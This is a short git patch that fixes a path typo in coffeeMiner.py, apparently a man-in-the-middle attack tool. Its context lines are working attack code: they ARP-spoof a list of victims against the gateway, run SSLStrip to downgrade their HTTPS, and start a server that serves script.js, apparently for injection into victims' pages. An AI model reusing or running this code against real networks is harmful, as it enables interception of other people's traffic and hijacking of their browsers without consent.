From bc8c52e2edcaf1de23f7a48db630ff1cd2a7c4da Mon Sep 17 00:00:00 2001 From: Chase Taylor Date: Mon, 8 Jan 2018 19:45:46 -0700 Subject: [PATCH] Fixed typo on line 50 --- coffeeMiner.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/coffeeMiner.py b/coffeeMiner.py index 163eb18..9ad8b3f 100644 --- a/coffeeMiner.py +++ b/coffeeMiner.py @@ -41,7 +41,7 @@ for victim in victims: os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") # run SSLStrip on port 8000 -os.system("python sslstrip.py -l 8000 &") +os.system("python sslstrip/sslstrip.py -l 8000 &") # start the http server for serving the script.js, in a new console os.system("xterm -hold -e 'python3 httpServer.py' &")